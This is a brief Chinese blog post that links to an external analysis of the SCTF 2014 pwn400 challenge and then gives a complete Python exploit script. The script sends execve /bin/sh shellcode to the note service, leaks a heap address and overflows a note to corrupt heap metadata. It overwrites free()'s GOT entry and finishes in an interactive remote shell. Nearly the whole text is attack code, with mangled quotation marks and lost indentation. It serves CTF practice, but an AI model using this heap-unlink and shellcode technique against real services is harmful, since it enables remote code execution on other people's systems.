这个题目在这个链接中分析得很透彻,不再多余地写了。http://bruce30262.logdown.com/posts/245613-sctf-2014-pwn400
exploit:
from socket import *
import struct
import time
shellcode = "\x90\x90\x90\x90\x90\x90"+"\xeb\x08"+"AAAA"+"\x90"*10+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x59\x50\x5a\xb0\x0b\xcd\x80"
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(("192.168.200.7", 10001))
time.sleep(1)
print sock.recv(1024)
#new two note: 2, 1
for i in xrange(2):
sock.send(‘1\n‘)
time.sleep(1)
sock.recv(1024)
sock.send(str(i+1) + ‘\n‘)
time.sleep(1)
sock.recv(1024)
sock.send(str(i+1) + ‘\n‘)
time.sleep(1)
sock.recv(1024)
sock.send(str(i+1) + ‘\n‘)
time.sleep(1)
sock.recv(1024)
#new the third note: 3
sock.send(‘1\n‘)
time.sleep(1)
sock.recv(1024)
sock.send(‘3\n‘)
time.sleep(1)
sock.recv(1024)
sock.send(‘3\n‘)
time.sleep(1)
sock.recv(1024)
time.sleep(1)
#store shellcode in note 3
sock.send(shellcode+"\n")
#get the note 1‘s address
sock.send(‘3\n‘)
time.sleep(1)
print sock.recv(100)
sock.send(‘1\n‘)
time.sleep(1)
note1_addr = sock.recv(2048)
while note1_addr.find(‘location:‘) == -1:
note1_addr += sock.recv(2048)
print note1_addr
note1_addr = note1_addr[note1_addr.find(‘location:‘) + 11:]
note1_addr = note1_addr[:note1_addr.find(‘\n‘)]
addr1 = int(note1_addr, 16)
print addr1
#note 2‘s address
addr2 = addr1 + 0x170
#note 3‘s address
addr3 = addr2 + 0x170
#shellcode‘s address
addr_shellcode = struct.pack("<I", addr3 + 0x6c)
#free()‘s Got: 0x0804a450
exploit = "A"*256+"BBBB"+struct.pack("<I",addr2)+addr_shellcode+"\x4c\xa4\x04\x08"
#edit note 1
sock.send("4\n")
time.sleep(1)
print sock.recv(1024)
sock.send("1\n")
time.sleep(1)
print sock.recv(1024)
sock.send(exploit+"\n")
time.sleep(1)
print sock.recv(1024)
#delete node 2
sock.send("5\n")
time.sleep(1)
sock.recv(1024)
time.sleep(1)
sock.send(hex(addr2)[2:10]+‘\n‘)
time.sleep(1)
sock.recv(1024)
while True:
sock.send(raw_input(‘$ ‘) + ‘\n‘)
time.sleep(1)
temp = sock.recv(2048)
print temp
时间: 2024-10-03 21:54:28